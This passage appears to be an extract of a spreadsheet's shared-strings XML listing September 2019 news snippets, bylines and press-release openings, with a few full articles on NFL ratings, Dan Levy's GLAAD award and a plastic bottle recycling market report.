    <t>Marshall’s intake paperwork identified him as a Shepherd mix, but one wouldn’t know by looking at him. Dry cracked skin covered his head...</t>
  </si>
  <si>
    <t>PEMBERTON TOWNSHIP, N.J. (AP) — It looks like something from a science fiction movie. A newborn two-headed timber rattlesnake has been...</t>
  </si>
  <si>
    <t>0 comment NHS hospitals are stepping back in time with vintage makeovers to help dementia patients cope with stress and anxiety. Old...</t>
  </si>
  <si>
    <t>Milos Raonic believes US Open champion Bianca Andreescu is “definitely” capable of becoming world number one in the next few months....</t>
  </si>
  <si>
    <t>Raf Wober</t>
  </si>
  <si>
    <t>Protesters in Hong Kong burned a Chinese flag and police fired pepper spray Saturday in renewed clashes over grievances by the...</t>
  </si>
  <si>
    <t>By Grace Walton</t>
  </si>
  <si>
    <t>See photos images Skip to next photo 1/1 Show caption 1/1 THOUSANDS of people flocked to Worcester today for the City Run. Around...</t>
  </si>
  <si>
    <t>Chris Gardner</t>
  </si>
  <si>
    <t>NBC hosted an event in Hollywood on Monday night to highlight the "past, present and future" comedy stars as the network was dealing with a...</t>
  </si>
  <si>
    <t>DELAFIELD, Wis., Sept. 3, 2019 /PRNewswire/ -- St. John's Northwestern Military Academy (SJNMA) has hired Michael Stefan to restore its...</t>
  </si>
  <si>
    <t>INTRODUCTION: Global Long-time period Care Software Market First of all, Global Long-time period Care Software Market holds a serious...</t>
  </si>
  <si>
    <t>CNBC did a deep dive through the most recent Wall Street research to find stocks with upside potential.</t>
  </si>
  <si>
    <t>Thousands of former servicemen brought parts of central London to a standstill in protest against the prosecution of “Soldier F” for his...</t>
  </si>
  <si>
    <t>CHICAGO, Sept. 5, 2019 /PRNewswire/ -- PACO Collective, an award-winning cross-cultural marketing agency and one of the fastest growing...</t>
  </si>
  <si>
    <t>Originally posted on https://www.bayviewrecovery.com/rehab-blog/telling-others-you-have-a-mental-illness/ It can be hard to tell others...</t>
  </si>
  <si>
    <t>Wall Street eked out gains on Friday and the dollar lost ground as a weaker-than-expected U.S. jobs report tempered investor sentiment on...</t>
  </si>
  <si>
    <t>Allianz Asset Management GmbH decreased its position in Vail Resorts, Inc. (NYSE:MTN) by 50.3% during the 2nd quarter, according to its...</t>
  </si>
  <si>
    <t>Craig Toedtman and Laura Hutchins of Resource Development Company, both with diverse backgrounds and experiences in career services, have...</t>
  </si>
  <si>
    <t>09/07/2019 7:35 Mauricio Dubon hit a home run and Jeff Samardzija went six solid innings as the visiting San Francisco Giants topped the...</t>
  </si>
  <si>
    <t>Jon Cooper</t>
  </si>
  <si>
    <t>A serial Derbyshire offender tried to punch a probation officer during an interview - Ripley and Heanor News</t>
  </si>
  <si>
    <t>China - One of the biggest challenges with ordering items online is dealing with the anxiety of actually seeing it delivered. Now, there is...</t>
  </si>
  <si>
    <t>LOS ANGELES, Sept. 4, 2019 /PRNewswire/ -- CJ 4DPLEX (www.cj4dx.com), the world's leading cinema technology company, together with B&amp;B...</t>
  </si>
  <si>
    <t>CANBERRA, Australia (AP) — Australia's government and media say two British Australians and a third Australians have been detained in Iran....</t>
  </si>
  <si>
    <t>Businesses in data storage, cannabis, industrial safety, delivery and fintech lead the pack.</t>
  </si>
  <si>
    <t>JEKYLL ISLAND, Ga., Sept. 17, 2019 /PRNewswire/ -- Get ready for another gloriously long weekend of tantalizing tastes and family fun along...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 11, 2019 /PRNewswire/ -- The wine manufacturing (wineries) market consists of sales of wines, ciders and fortified wines by...</t>
  </si>
  <si>
    <t>Bill Baer NBC Sports</t>
  </si>
  <si>
    <t>MLB.com’s Bryan Hoch reports that Yankees outfielder Mike Tauchman will miss six to eight weeks with a Grade 2 strain of his left calf. At...</t>
  </si>
  <si>
    <t>Brokerages expect Paramount Group Inc (NYSE:PGRE) to announce $192.58 million in sales for the current fiscal quarter, according to Zacks....</t>
  </si>
  <si>
    <t>CLINTON, N.J., Sept. 20, 2019 (GLOBE NEWSWIRE) -- For the second year in a row, Unity Bancorp, Inc. (NASDAQ: UNTY), the parent company of...</t>
  </si>
  <si>
    <t>TPM Inc., the Southeast's leading 2D and 3D design technology provider, announces its Fall Southeastern Tour of live 3D product design...</t>
  </si>
  <si>
    <t>Nashville, TN, September 24, 2019 --(PR.com)-- The Nashville-based creative marketing agency, Astute Communications, is making a big move....</t>
  </si>
  <si>
    <t>Since 2007 Carapinha &amp; Company, Inc has traveled 4,928,796 km (air and land) implementing access projects, written 1252 pages presenting...</t>
  </si>
  <si>
    <t>Noble Energy Inc (NYSE:NBL) traded in a range yesterday that spanned from a low of $22.98 to a high of $24.03. Yesterday, the shares gained...</t>
  </si>
  <si>
    <t>CHRIS HUBBUCH chubbuch@madison.com</t>
  </si>
  <si>
    <t>A two-decade research project headed by a UW-Madison professor has shown that minor modifications to the landscape can dramatically improve...</t>
  </si>
  <si>
    <t>SEATTLE A new interactive touch screen at Whole Foods Market checkout stands asks shoppers to rate their experience on a scale of one to...</t>
  </si>
  <si>
    <t>France and Germany are agreed on a strategy to respond to a global economic slowdown at a time of international trade problems but differ...</t>
  </si>
  <si>
    <t>CHICAGO, Sept. 26, 2019 /PRNewswire/ -- According to the new market research report "Wastewater Treatment Services Market by Type (Design &amp;...</t>
  </si>
  <si>
    <t>Shares of Abbott Laboratories (NYSE:ABT) have earned a consensus rating of “Buy” from the nineteen ratings firms that are presently...</t>
  </si>
  <si>
    <t>U.S. health officers have found low levels of a potentially melanoma-inflicting chemical in a popular heartburn drug. On Friday (Sept....</t>
  </si>
  <si>
    <t>John Parra/Getty Images for Verizon John Parra/Getty Images for VerizonCamila Cabello performed an intimate hometown show in Miami...</t>
  </si>
  <si>
    <t>Tweet Share 0 +1 LinkedIn 0 Albany, USA, 2019-Sep-12 — /EPR Network/ — Market Research Hub (MRH) has actively included a new research...</t>
  </si>
  <si>
    <t>A fashion look from March 2018 featuring Retrò t-shirts Nomadic messenger bags … A fashion look from March 2018 featuring Retrò t-shirts...</t>
  </si>
  <si>
    <t>Marc Lancaster</t>
  </si>
  <si>
    <t>Nationals manager Dave Martinez will be away from the team indefinitely after undergoing what general manager Mike Rizzo called a "minor"...</t>
  </si>
  <si>
    <t>By Andrew Wu</t>
  </si>
  <si>
    <t>Manchester: Mitchell Starc has embraced the new Australian way and bowled himself within reach of a belated Test recall as the visitors...</t>
  </si>
  <si>
    <t>(NAPSI)—It’s a special time each fall as kids head back to their classrooms, reunite with friends and tackle new lessons. This week’s...</t>
  </si>
  <si>
    <t>Karl Burke expects Lord Of The Lodge to prove a tough nut to crack in the Tattersalls Stakes at Newmarket.</t>
  </si>
  <si>
    <t>Mel B is happy to be single and avoid “scary” relationships after living through a traumatic marriage, the performer has said. The Spice...</t>
  </si>
  <si>
    <t>Champaran: Students, therefore, “Bhitiharwa Gandhi Ashram” in Bihar’s Champaran where Kasturba Gandhi used to teach. (Photo: IANS)...</t>
  </si>
  <si>
    <t>By RAMÓN ESPINOSA and DÁNICA COTO</t>
  </si>
  <si>
    <t>Brazilian President Jair Bolsonaro says he is up for discussing the fires in the Amazon at the next U.N. general assembly.</t>
  </si>
  <si>
    <t>The New York Federal Reserve announced it'd convey out its second in a single day repurchasing operation of the week on Wednesday, after it...</t>
  </si>
  <si>
    <t>(MENAFN - Jordan Times) AMMAN — From 2014 to 2018, 605 cases of suicide were recorded in Jordan, with the figure exponentially increasing...</t>
  </si>
  <si>
    <t>Leading Pioneer of Jarred Salsas Helps Families Ease Into the Busy Season with Flavorful, Veggie-Loaded Dinner Solutions ORANGE, Calif.,...</t>
  </si>
  <si>
    <t>COLUMBIA, Md., Sept. 6, 2019 /PRNewswire-PRWeb/ -- James N. Purcell Jr. asserts that well-prepared interventions have gone missing for the...</t>
  </si>
  <si>
    <t>OTTAWA — Andrew Scheer and Justin Trudeau fought Wednesday for the high ground on who was best suited to fight the ravages of climate...</t>
  </si>
  <si>
    <t>By Victoria Chessum</t>
  </si>
  <si>
    <t>A mum gatecrashed her son’s maths class to stop him being rude to teachers in a bid to teach him a valuable lesson. Becky Crandley swanned...</t>
  </si>
  <si>
    <t>Viewers were left crying with joy after watching a German girl and her eight dogs form a canine conga line on Britain’s Got Talent spin-off...</t>
  </si>
  <si>
    <t>By Associated Press Reporter</t>
  </si>
  <si>
    <t>US President Donald Trump has been ordered to give a videotaped deposition in a court case relating to two protesters who claim they were...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / September 13, 2019 / Levi &amp; Korsinsky, LLP announces that class action lawsuits have commenced on behalf of...</t>
  </si>
  <si>
    <t>Adam Peleshaty</t>
  </si>
  <si>
    <t>Four Interlake high schools took part in the Warren Wildcats JV Girls Volleyball Tournament at Warren Collegiate Institute on Sept. 20 and...</t>
  </si>
  <si>
    <t>Cibc World Markets Corp cut its holdings in shares of ConocoPhillips (NYSE:COP) by 71.3% during the second quarter, according to the...</t>
  </si>
  <si>
    <t>Skipper Ryan Ten Doeschate pinpointed the desire of the Essex players as pivotal to adding the Specsavers County Championship title to...</t>
  </si>
  <si>
    <t>CFIUS will focus its review on investments in critical Technology, critical Infrastructure, and sensitive personal Data</t>
  </si>
  <si>
    <t>This press release was orginally distributed by SBWire Kent, UK -- (SBWIRE) -- 09/20/2019 -- One of the leading hot tub and swim spa...</t>
  </si>
  <si>
    <t>D.A. Davidson &amp; CO. trimmed its holdings in Fortinet Inc (NASDAQ:FTNT) by 42.1% in the second quarter, according to its most recent 13F...</t>
  </si>
  <si>
    <t>Dublin, Sept. 27, 2019 (GLOBE NEWSWIRE) -- The "Smart Water Metering - Global Market Outlook (2018-2027)" report has been added to...</t>
  </si>
  <si>
    <t>The NFL’s opening weekend to its 100th season delivered strong ratings for all games. The league and Nielsen said Wednesday there was an average of 17.1 million viewers for games, which is a 5 per cent increase over last year. The New York Giants game against the Dallas Cowboys on Fox averaged 23.9 million, making it the network’s most-watched opener since 2016. NBC’s “Sunday Night Football” — Pittsburgh Steelers at New England Patriots — as well as the Sept. 5 kickoff game between the Green Bay Packers and Chicago Bears each averaged 22.2 million. This is the first time both network games on opening weekend posted increases since 2015. ESPN’s “Monday Night Football” doubleheader was the most watched in four years. The early game between the Houston Texans and New Orleans Saints was the most-watched program on cable Monday (13 million) while the Denver Broncos-Oakland Raiders game was second (10.6 million). CBS’ games, mostly in the 1 p.m. EDT window, were down 4 per cent from last season. ___ More AP NFL: https://apnews.com/NFL and https://twitter.com/AP_NFL The Associated Press</t>
  </si>
  <si>
    <t>Joel Beall</t>
  </si>
  <si>
    <t>Phil Mickelson's foray into social media the past year has produced its share of art works. But the masterpiece—or should we say, Masters...</t>
  </si>
  <si>
    <t>Discover the Past prepares for busy 'spine-tingling' Halloween season</t>
  </si>
  <si>
    <t>Historic area hearkens the speak easy spirit with booze, haunt boo's, barbeque, and shopping KANSAS CITY, Mo. - Sept. 4, 2019 -...</t>
  </si>
  <si>
    <t>LONDON, Sept. 5, 2019 /PRNewswire/ -- Theragnostics, which is developing molecular radiotherapy for imaging and treating a broad range of...</t>
  </si>
  <si>
    <t>SEATTLE  The Seattle Seahawks entered the offseason thinking they might be paying Frank Clark at least $17.1 million this season to serve...</t>
  </si>
  <si>
    <t>By Dave Lemery | The Center Square</t>
  </si>
  <si>
    <t>Pennsylvania Attorney General Josh Shapiro on Monday joined 49 of his peers from across the country in announcing an investigation into...</t>
  </si>
  <si>
    <t>Canopy Growth Corp.'s co-founder and recently ousted co-chief executive says his eye is on a new frontier for medicine beyond cannabis: psychedelics. Bruce Linton says he will be a director at Mind Medicine Inc., an Australian-based entity that is seeking to establish psychedelic-assisted treatments for mental illness, such as medicinal psilocybin and medicinal MDMA. He sees the opportunity for psychedelics as medicine as similar to the outlook for medicinal cannabis five or six years ago, where regulations were starting to ease in some jurisdictions. Linton is not out of the cannabis business, however, and says he will be an active adviser at a pair of companies in the U.S. He will serve as a special adviser to animal health and CBD company Better Choice and executive chairman at recreational dispensary Gage Cannabis Co. He will also be an activist investor in OG DNA Genetics Inc. and Slang Worldwide Inc., a cannabis consumer packaged goods company whose co-founders previously sold Mettrum Health Corp. to Canopy. The roles come after Linton was terminated from the top job at the Smiths Falls, Ont-based cannabis company in July. Canopy Growth holds its annual meeting of shareholders in Toronto today. Companies in this story: (TSX:WEED)</t>
  </si>
  <si>
    <t>The hijackers wanted blood. And when they saw U.S. navy diver Robert Dean Stethem’s military identification, they decided he would be the...</t>
  </si>
  <si>
    <t>Applied Data Finance, LLC (ADF), a leading technology-enabled lender and asset manager, announced today that it has upsized its current...</t>
  </si>
  <si>
    <t>The "High Temperature Cables Market by End-users and Geography - Global Forecast and Analysis 2019-2023" report has been added to...</t>
  </si>
  <si>
    <t>Replacing Chinese telecoms equipment would cost European telecom operators about $3.5 billion, a report by industry research firm Strand...</t>
  </si>
  <si>
    <t>Originally posted on https://www.5percentinstitute.com/5-x-benefits-of-online-sales-training/ Online sales training is a new and...</t>
  </si>
  <si>
    <t>Singapore's non-oil domestic exports declined at a slower than expected pace in August, data from Enterprise Singapore revealed on Tuesday....</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 3, 2019 /PRNewswire/ -- Executive Summary A comprehensive research report created through extensive primary research...</t>
  </si>
  <si>
    <t>VIENNA (AP) — Two-time Olympic champion Marcel Hirscher, the first Alpine skier to win eight overall World Cup titles, is retiring after 12...</t>
  </si>
  <si>
    <t>Fred Steiner</t>
  </si>
  <si>
    <t>It’s Harvest and Herb Festival weekend in Ada, with the event set from 9 a.m. to 4 p.m. Saturday on Main Street. The 34th annual Ada Area...</t>
  </si>
  <si>
    <t>ReutersMore from Reuters;Phil Noble</t>
  </si>
  <si>
    <t>MANCHESTER — British Prime Minister Boris Johnson denied on Monday that he had inappropriately touched a female journalist 20 years ago,...</t>
  </si>
  <si>
    <t>SAN FRANCISCO (AP) — The Latest on expected power shut-offs in Northern California (all times local): 6:15 p.m. Pacific Gas &amp; Electric is...</t>
  </si>
  <si>
    <t>The Philadelphia Eagles will be without receivers Alshon Jeffery and DeSean Jackson for their game against visiting Detroit. Jeffery and...</t>
  </si>
  <si>
    <t>Atlanta-based alternative/progressive rock band Cascadent have released their new single "Neptune," available on all digital platforms NOW....</t>
  </si>
  <si>
    <t>E. Lynn Price is an experienced speaker, attorney, and author of “Negotiate It!: How to Crush Your Fears, Develop Your Negotiation Muscle,...</t>
  </si>
  <si>
    <t>SAN DIEGO, Sept. 9, 2019 /PRNewswire/ -- DelMar Pharmaceuticals, Inc. (Nasdaq: DMPI) ("DelMar" or the "Company"), a biopharmaceutical...</t>
  </si>
  <si>
    <t>Press Release and Top  News From 24-7 Press Release Newswire</t>
  </si>
  <si>
    <t>Local residents of the Playas del Coco region pitch in to help a valued local wildlife veterinarian hit by hard times. PLAYAS DEL COCO,...</t>
  </si>
  <si>
    <t>OSLO, Norway, Sept. 18, 2019 /PRNewswire/ -- OnTime Networks, a global leader for rugged, time synchronized Ethernet solutions for the...</t>
  </si>
  <si>
    <t>Today, CreakyJoints®, a Global Healthy Living Foundation patient community, shared study findings that nearly three-fourths of people with...</t>
  </si>
  <si>
    <t>AMARILLO, Texas (AP) - Police reports describe concerns eight years ago that the gunman who killed seven and wounded 25 last month in West...</t>
  </si>
  <si>
    <t>STOCKHOLM, Sept. 16, 2019 /PRNewswire/ -- Autoliv, Inc. (NYSE: ALV and SSE: ALIVsdb), the worldwide leader in automotive safety systems,...</t>
  </si>
  <si>
    <t>SOURCE: TriplePundit This article series is sponsored by the SunTrust Foundation and produced by the TriplePundit editorial team. Four...</t>
  </si>
  <si>
    <t>Automotive Fault Circuit Controllers Global Automotive Fault Circuit Controllers market size will increase to xx Million US$ by 2025, from...</t>
  </si>
  <si>
    <t>By Mike Ellis -</t>
  </si>
  <si>
    <t>In June, the Planning Commission changed its schedule to one meeting a month in the hopes of attracting new members to fill long-standing...</t>
  </si>
  <si>
    <t>PARSIPPANY, N.J., Sept. 09, 2019 (GLOBE NEWSWIRE) -- Acrow Bridge, a leading international bridge engineering and supply company, is...</t>
  </si>
  <si>
    <t>CHRISTOPHER RUGABER and RICARDO ALONSO-ZALDIVAR AP Economics Writer</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The proportion of Americans without health insurance edged up in 2018 — the first increase in nearly a decade after...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Bernie Sanders’ campaign says that it has received contributions from more than 1 million individual donors and that it’s...</t>
  </si>
  <si>
    <t>By Carolyn Cummins</t>
  </si>
  <si>
    <t>Private childcare owner/operators Mike Wu and Shan Kuo are looking to take advantage of the burgeoning childcare property investment market...</t>
  </si>
  <si>
    <t>Kuldeep plays for Kolkata Knight Riders in the Indian Premier League and is a key cog in the bowling wheel of KKR. (ANI)</t>
  </si>
  <si>
    <t>London [UK], Sept 20 (ANI): Wrist spinner Kuldeep Yadav isn't worried about his exclusion from the last two T20I series against West Indies...</t>
  </si>
  <si>
    <t>Mercer, a global consulting leader in advancing health, wealth and career, and a wholly owned subsidiary of Marsh &amp; McLennan Companies...</t>
  </si>
  <si>
    <t>Myke Thomas</t>
  </si>
  <si>
    <t>With homes getting smaller, homeowners face new challenges with decorating their abodes. Here are some small spaces decorating trends...</t>
  </si>
  <si>
    <t>Dublin, Sept. 18, 2019 (GLOBE NEWSWIRE) -- The "China and Hong Kong Data Center Market - Investment Analysis and Growth Opportunities...</t>
  </si>
  <si>
    <t>This ROCKS!</t>
  </si>
  <si>
    <t>Some customer loyalty schemes are building up detailed profiles about people and selling those insights to other businesses, the consumer...</t>
  </si>
  <si>
    <t>CHICAGO, Sept. 30, 2019 (GLOBE NEWSWIRE) — Tempus, a technology company advancing precision medicine through the practical application of...</t>
  </si>
  <si>
    <t>Newser - By Jenn Gidman</t>
  </si>
  <si>
    <t>On Friday, the Wall Street Journal wandered into the fray of the Trump whistleblower flap, backing up unconfirmed reports that what set off...</t>
  </si>
  <si>
    <t>First, open up the App Store tab and then select the Arcade tab. Select the Try it Free button on the top of the page. You’ll receive a...</t>
  </si>
  <si>
    <t>Darryl Coote</t>
  </si>
  <si>
    <t>The British Airline Pilots’ Association said its latest offer narrows the differences between British Airways' package to about $6 million...</t>
  </si>
  <si>
    <t>By JONATHAN LANDRUM Jr. AP Entertainment Writer</t>
  </si>
  <si>
    <t>This July 23, 2019 photo shows Pedro Jimeno, left, and Chantel Everett posing for a portrait to promote their show, "90 Day Fiance" in Los...</t>
  </si>
  <si>
    <t>SAN LUIS OBISPO, Calif., Sept. 17, 2019 /PRNewswire-PRWeb/ -- Avoiding bankruptcy requires strong fundamental business planning and...</t>
  </si>
  <si>
    <t>Wiseguyreports.Com Publish New Market Research Report On -“Smart Medical Devices Market 2019 Global Analysis, Size, Share, Trends,...</t>
  </si>
  <si>
    <t>The candidate LREM to the mayor of Paris Benjamin Griveaux promises, if elected, to "suspend all work until the end of 2020" in an...</t>
  </si>
  <si>
    <t>Now with added video! Share this post if you enjoyed! 🙂 Source link Share and Enjoy</t>
  </si>
  <si>
    <t>September 01, 2019 - /PressAdvantage/ - Access Land Realty, a land buying company based in Post Falls Idaho, has recently announced that...</t>
  </si>
  <si>
    <t>U.S. presidential hopeful Amy Klobuchar on Tuesday led a letter by U.S. senators that urged the Federal Trade Commission (FTC) to closely...</t>
  </si>
  <si>
    <t>A vehicle believed to be carrying the body of former Zimbabwe president Robert Mugabe left a Singapore funeral parlor on Wednesday morning,...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Oprah Winfrey has selected Ta-Nehisi Coates' novel "The Water Dancer" as her next book club pick. Winfrey announced her...</t>
  </si>
  <si>
    <t>Discover Home Equity Loans has reached a milestone by exceeding $1 billion in total loan balance and doubling origination volume each of...</t>
  </si>
  <si>
    <t>Maura Forrest</t>
  </si>
  <si>
    <t>Such fakery in the middle of an election raises issues of how such misinformation is used, say experts in the ‘fake news’ phenomenon</t>
  </si>
  <si>
    <t>Canadian Dan Levy, showrunner and star of the TV comedy Schitt's Creek , received a GLAAD award Saturday evening in San Francisco for promoting LGBTQ acceptance and credited a supportive network, including his family, for giving him the courage to come out during his teenage years. "Had I not had the love to give me a sense of security, I don't know if I would have found my way out of the closet, let alone create the opportunity for myself to tell stories on TV that have affected some kind of positive change in the world," Levy told the audience at the gala event. "Support, encouragement and love: Three relatively simple acts of kindness that can change the course of a person's life." GLAAD, an LGBTQ advocacy group, gave the Toronto-born star its Davidson/Valentini Award, given to someone who "has made a significant difference in promoting acceptance for the LGBTQ community," according to the GLAAD website. The award is named after Craig Davidson, GLAAD's first executive director, and his partner Michael Valentini. Levy joked on stage that he was an "out and proud gay Emmy loser." The riches-to-rags sitcom Schitt's Creek , which began on CBC and was co-created with his father Eugene Levy, was a best comedy series nominee at the 2019 Emmy Awards , but lost to the British show Fleabag . Eugene Levy, Annie Murphy, Daniel Levy and Catherine O’Hara, left to right, star in Schitt's Creek, a nominee for best comedy series at the 2019 Emmy Awards earlier this month. (Amanda Edwards/Getty Images) Schitt's Creek centres on a family that loses its fortune and is forced to relocate to a small town. Levy's character, David Rose, is pansexual — meaning he's open to all sexual orientations and gender identities — and as such, became among the first depicted on television. The character's sexual preference was explained in the show's first season (using a metaphor of wine) and has been widely commended since for being written with acceptance and without homophobia. "I like the wine, and not the label," Levy's character famously responds after being asked about his sexual preference. "I like the wine and not the label." Happy Pride from #SchittsCreek! 🌈 pic.twitter.com/Bj0xicDlvu — @SchittsCreek Schitt's Creek cast members Annie Murphy (Alexis Rose), Emily Hampshire (Stevie Budd) and Noah Reid (Patrick Brewer) presented the award. Levy, who has experienced a steady rise in Hollywood since Schitt's Creek became available in the U.S. through Netflix, signed a three-year deal with Disney's ABC studios recently to develop and produce projects. He took home an MTV Award in June for best comedic performance. Daniel Levy, The Rock and others promote positivity at MTV awards The Canadian has participated in fundraising efforts to support GLAAD. Previous winners of the Davidson/Valenti award include CNN host Don Lemon and singer-songwriter Adam Lambert. Schitt's Creek scored a Canadian Screen Award earlier this year for best comedy series. Its sixth and final season will begin airing in January.</t>
  </si>
  <si>
    <t>AUSTIN, Texas and LONDON, Sept. 16, 2019 (GLOBE NEWSWIRE) -- CognitiveScale, the leader in practical, scalable and trusted AI software,...</t>
  </si>
  <si>
    <t>The "2019 Global Forecast for Electric Signs, Fluorescent Lamp (2020-2025 Outlook)-Manufacturing &amp; Markets Report" report has been added to...</t>
  </si>
  <si>
    <t>Philip Duncan</t>
  </si>
  <si>
    <t>The world champion revealed his admiration for one of Britain’s greatest drivers ahead of his landmark birthday</t>
  </si>
  <si>
    <t>3D Printing in Automotive Market Has Better Market Opportunities in Expansion for its Precision 2019 Overview: Industrial 3D printers are...</t>
  </si>
  <si>
    <t>Wolves midfielder Joao Moutinho admitted the club’s Europa League exploits have affected their Premier League form. Wolves’ recent home...</t>
  </si>
  <si>
    <t>St. Louis, Sept. 25, 2019 (GLOBE NEWSWIRE) -- - ButcherJoseph &amp; Co. (“ButcherJoseph”) served as exclusive financial advisor to AMPAM...</t>
  </si>
  <si>
    <t>Should British airlines do the same thing?</t>
  </si>
  <si>
    <t>Terry Jones</t>
  </si>
  <si>
    <t>Calgary Stampeders head coach Dave Dickenson (left) and Ottawa Redblacks head coach Rick Campbell (right) shake hands before addressing the...</t>
  </si>
  <si>
    <t>by Nathan Favel</t>
  </si>
  <si>
    <t>Welcome to this week’s NXT UK review, right here on Nerdly. I’m Nathan Favel and we have a very unique main event called “British Round...</t>
  </si>
  <si>
    <t>PHOENIX, ARIZONA, Sept. 25, 2019 (GLOBE NEWSWIRE) -- The ALICE Training Institute (www.alicetraining.com), the leading civilian active...</t>
  </si>
  <si>
    <t>Uniform Solutions, a highly rated supplier for employee uniform ideas at http://www.uniformsolutionsforyou.com/, is proud to announce a new...</t>
  </si>
  <si>
    <t>By  Danny Rust  @Danny_Rust10</t>
  </si>
  <si>
    <t>JOHN Sussex admits Basildon United are being affected by a barrage of red cards.</t>
  </si>
  <si>
    <t>The start of the school year is one of the greatest—and most stressful—periods for parents. The supplies checklist, the first-day jitters,...</t>
  </si>
  <si>
    <t>Tom Minear, State Political Reporter, Herald Sun</t>
  </si>
  <si>
    <t>The Country Fire Authority’s wage bill has soared by $100 million in just three years as its volunteer workforce continues to shrink.</t>
  </si>
  <si>
    <t>BAGHDAD (AP) — Iraqi officials: 12 dead in minibus blast near Shiite holy city of Karbala, one of the biggest attacks since IS defeat....</t>
  </si>
  <si>
    <t>Aziz Abdel-Qader</t>
  </si>
  <si>
    <t>The move came a few weeks after the CFTC launched probes into whether BitMEX allowed US investors to trade crypto</t>
  </si>
  <si>
    <t>Antonella Artuso                        More from Antonella Artuso</t>
  </si>
  <si>
    <t>This Toronto Sun file photo show union supporters protesting at Queen's Park on May 14, 2015 after bargaining broke down for striking...</t>
  </si>
  <si>
    <t>Bobby Bones is dedicated to his listeners. He never forgets where The Bobby Bones Show started and how it all got to where it is today....</t>
  </si>
  <si>
    <t>London, Sep 20 (IANS): European Commission President Jean-Claude Juncker has said that a no-deal Brexit would be "catastrophic" and he was...</t>
  </si>
  <si>
    <t>Summary: Brain Training for Dogs, a new in-home dog training course based on brain stimulation, is now available to dog owners in...</t>
  </si>
  <si>
    <t>A recent decision of the Fair Work Commission suggests that when small businesses implement a redundancy, it might not always be necessary...</t>
  </si>
  <si>
    <t>ATHOL, Idaho – Winter storms have forced Silverwood Theme Park to close for its last weekend of the 2019 season. “Due to the current...</t>
  </si>
  <si>
    <t>The Linear DC Servomotor market was valued at USD 423.68 Million in 2018 and is projected to reach USD 605.43 Million by 2024, at a CAGR of...</t>
  </si>
  <si>
    <t>Experty (CURRENCY:EXY) traded down 5.1% against the U.S. dollar during the 24-hour period ending at 13:00 PM Eastern on September 28th....</t>
  </si>
  <si>
    <t>A teen from Oneida County has been arrested for inappropriate contact with minors. 17-year-old Dylan Shalna of Rome was arrested on...</t>
  </si>
  <si>
    <t>WARSAW, Poland (AP) — The presidents of Germany and Poland opened daylong observances of the 80th anniversary of the start of World War II...</t>
  </si>
  <si>
    <t>Rob Lee</t>
  </si>
  <si>
    <t>WE'VE had a warm winter, but the main issue for us is that it has been our third very dry winter in a row. In fact, my local records that...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 9, 2019 /PRNewswire/ -- KEY FINDINGS The global virtual data rooms market is progressing owing to the global rise in...</t>
  </si>
  <si>
    <t>More Victorian women with breast cancer could soon be diagnosed quicker, with cutting-edge 3D screening technology to be rolled out across...</t>
  </si>
  <si>
    <t>Mark Berry</t>
  </si>
  <si>
    <t>Christian Gerhaher offers a special experience in his Mahler recital 25/09/2019 Mahler: Christian Gerhaher (baritone), Gerold Huber...</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 23, 2019 /PRNewswire/ -- Genetic Testing Market by Type (Predictive Testing, Carrier Testing, Prenatal &amp; Newborn Testing,...</t>
  </si>
  <si>
    <t>BALTIMORE, Md., Sept. 25, 2019 /PRNewswire-PRWeb/ -- POWER UP, the industry's premium cell phone charging technology company, has added a...</t>
  </si>
  <si>
    <t>Francis Ames-Lewis</t>
  </si>
  <si>
    <t>The five volumes offer a range of perspectives and chronological breadth for budding scholars of the field</t>
  </si>
  <si>
    <t>See which stocks are posting big moves after the bell.</t>
  </si>
  <si>
    <t>The consumption of plastics has grown radically and, subsequently, since 1970s, so has the creation of waste plastics. In relation with this growth the formation of the waste container has also changed. In the process of reproducing and consumption the amount of organic matter has deteriorated, while plastics have increased. Among various innovations from plastics materials plastic bottles are majorly consumed as well as dumped. To avoid this wastage of bottles recycling of the bottles is carried out on a large scale. Recycling of plastic bottles increases the reuse of plastic material. This recycling helps to reduce the land pollution taking place which is done eventually by converting them into lower or same grade plastic bottles. These recycled bottles are used for numerous applications depending on their material content. Most plastics are semi-permeable and absorb particles of food or beverage contained. Removal of wastage from these bottles is a very tedious task, which needs to be done carefully as any surplus heating may damage the plastic composition. Most recycled plastics are mainly used for making low-grade products. In order to convert plastic bottles into bio degradable plastic, the bottles are hydrolyzed to monomeric form and finally passed through distillation and re-polymerization processes. This process ends into where the bottle is transformed into a food grade plastic. A major challenge for producing recycled resins from plastic bottle is that most different plastic types are not compatible with each other because of integral immiscibility at the molecular level. In this case, the recycling faces the issues of differences in plastic processing requirements at a macro-scale. Browse More Detail Information About This Report At https://transparencymarketresearch.com/plastic-bottle-recycling-market.html The plastic bottle recycle market is growing at a steady rate in the near future. The market growth is driven by growing prospects for recycled plastic bottles and growing environmental concerns which creates land pollution. Recycling plastic water bottles also helps to conserve natural resources, especially oil, which is a nonrenewable natural resource available in restricted supply. The Environmental Protection Agency (EPA) estimates that recycling one ton of plastic conserves approximately 3.8 barrels of crude oil. Recycling plastic water bottles also help to decrease the amount of pollution in the air and water. Many landfill facilities will destroy plastic bottles to save waste, which can emit toxic pollutants or irritants into the air. The plastic resins used to manufacture water bottles also contains harmful chemicals. These harmful chemicals can penetrate into the soil or groundwater if they are able to break down in the landfill. Plastic bottle recycling market can be classified on the basis of the type of plastic material which includes polyethylene terephthalate (PET), high-density polyethylene (HDPE) and polypropylene (PP). PET is the mostly recycled plastic material among the plastic bottles recycling market followed by HDPE and PP material. For the ease of study the plastic bottle recycling market is divided among various geographies such as North America, Europe, Asia Pacific, Middle East &amp; Africa and South and Central America. North America has the largest market share in the recycling of the plastic bottles where the U.S. comprises of largest market share. Request Brochure of This Report at https://www.transparencymarketresearch.com/sample/sample.php?flag=B&amp;rep_id=9359&amp;source=atm Some of the key players in the plastic bottle recycling markets are Advanced Environmental Recycling Technologies, Avangard Innovative, Phoenix Technologies International, UltrePET, CarbonLITE, Complete Recycling, ECO2 Plastics, Evergreen Plastics, National Recycling Technologies, Recycle Clear, Worldwide Recycler Services, among others. This research report analyzes this market on the basis of its market segments, major geographies, and current market trends. Geographies analyzed under this research report include North America Asia Pacific Europe Middle East and Africa Latin America This report 